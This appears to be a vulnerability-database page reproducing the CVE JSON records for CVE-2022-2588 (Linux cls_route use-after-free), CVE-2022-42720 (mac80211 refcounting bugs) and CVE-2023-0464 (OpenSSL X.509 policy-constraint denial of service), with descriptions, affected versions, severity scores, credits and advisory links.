{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:39:08.044Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5565-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5562-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/09/6" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5582-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2588" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5564-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5566-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1117/" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5588-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5560-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://github.com/Markakd/CVE-2022-2588" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5567-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5560-2" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://lore.kernel.org/netdev/20220809170518.164662-1-cascardo@canonical.com/T/#u" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5557-1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "packageName": "linux", "platforms": [ "Linux" ], "product": "linux", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git", "vendor": "The Linux Kernel Organization", "versions": [ { "lessThan": "6.0~rc1", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Zhenpeng Lin working with Trend Micro\u0027s Zero Day Initiative" } ], "descriptions": [ { "lang": "en", "value": "It was discovered that the cls_route filter implementation in the Linux kernel would not remove an old filter from the hashtable before freeing it if its handle had the value 0." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-08T17:50:47.948Z", "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "shortName": "canonical" }, "references": [ { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5565-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5562-1" }, { "tags": [ "issue-tracking" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/09/6" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5582-1" }, { "tags": [ "issue-tracking" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2588" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5564-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5566-1" }, { "tags": [ "issue-tracking" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1117/" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5588-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5560-1" }, { "tags": [ "issue-tracking" ], "url": "https://github.com/Markakd/CVE-2022-2588" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5567-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5560-2" }, { "tags": [ "issue-tracking" ], "url": "https://lore.kernel.org/netdev/20220809170518.164662-1-cascardo@canonical.com/T/#u" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5557-1" } ] } }, "cveMetadata": { "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "assignerShortName": "canonical", "cveId": "CVE-2022-2588", "datePublished": "2024-01-08T17:50:47.948Z", "dateReserved": "2022-07-29T23:41:31.412Z", "dateUpdated": "2024-08-03T00:39:08.044Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42720
Vulnerability from cvelistv5
Published
2022-10-13 00:00
Modified
2024-08-03 13:10
Severity ?
EPSS score ?
Summary
Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:10:41.481Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204059" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=0b7808818cb9df6680f98996b8e9a439fa7bcc2f" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204059" }, { "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=0b7808818cb9df6680f98996b8e9a439fa7bcc2f" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-42720", "datePublished": "2022-10-13T00:00:00", "dateReserved": "2022-10-10T00:00:00", "dateUpdated": "2024-08-03T13:10:41.481Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0464
Vulnerability from cvelistv5
Published
2023-03-22 16:36
Modified
2024-08-02 05:10
Severity ?
EPSS score ?
Summary
A security vulnerability has been identified in all supported versions
of OpenSSL related to the verification of X.509 certificate chains
that include policy constraints. Attackers may be able to exploit this
vulnerability by creating a malicious certificate chain that triggers
exponential use of computational resources, leading to a denial-of-service
(DoS) attack on affected systems.
Policy processing is disabled by default but can be enabled by passing
the `-policy' argument to the command line utilities or by calling the
`X509_VERIFY_PARAM_set1_policies()' function.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:10:56.350Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://security.netapp.com/advisory/ntap-20230406-0006/" }, { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230322.txt" }, { "name": "3.1.1 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545" }, { "name": "3.0.9 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1" }, { "name": "1.1.1u git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b" }, { "name": "1.0.2zh patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e" }, { "tags": [ "x_transferred" ], "url": "https://www.couchbase.com/alerts/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5417" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.1.1", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.9", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1u", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zh", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "David Benjamin (Google)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Dr Paul Dale" } ], "datePublic": "2023-03-21T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "A security vulnerability has been identified in all supported versions\u003cbr\u003e\u003cbr\u003eof OpenSSL related to the verification of X.509 certificate chains\u003cbr\u003ethat include policy constraints. Attackers may be able to exploit this\u003cbr\u003evulnerability by creating a malicious certificate chain that triggers\u003cbr\u003eexponential use of computational resources, leading to a denial-of-service\u003cbr\u003e(DoS) attack on affected systems.\u003cbr\u003e\u003cbr\u003ePolicy processing is disabled by default but can be enabled by passing\u003cbr\u003ethe `-policy\u0027 argument to the command line utilities or by calling the\u003cbr\u003e`X509_VERIFY_PARAM_set1_policies()\u0027 function." } ], "value": "A security vulnerability has been identified in all supported versions\n\nof OpenSSL related to the verification of X.509 certificate chains\nthat include policy constraints. Attackers may be able to exploit this\nvulnerability by creating a malicious certificate chain that triggers\nexponential use of computational resources, leading to a denial-of-service\n(DoS) attack on affected systems.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy\u0027 argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()\u0027 function." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": "inefficient algorithmic complexity", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-22T16:36:47.383Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230322.txt" }, { "name": "3.1.1 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545" }, { "name": "3.0.9 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1" }, { "name": "1.1.1u git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b" }, { "name": "1.0.2zh patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e" }, { "url": "https://www.couchbase.com/alerts/" }, { "url": "https://www.debian.org/security/2023/dsa-5417" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, { "url": "https://security.gentoo.org/glsa/202402-08" }, { "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ], "source": { "discovery": "UNKNOWN" }, "title": "Excessive Resource Usage Verifying X.509 Policy Constraints", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-0464", "datePublished": "2023-03-22T16:36:47.383Z", "dateReserved": "2023-01-24T13:50:25.835Z", "dateUpdated": "2024-08-02T05:10:56.350Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Loading…
Loading…
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.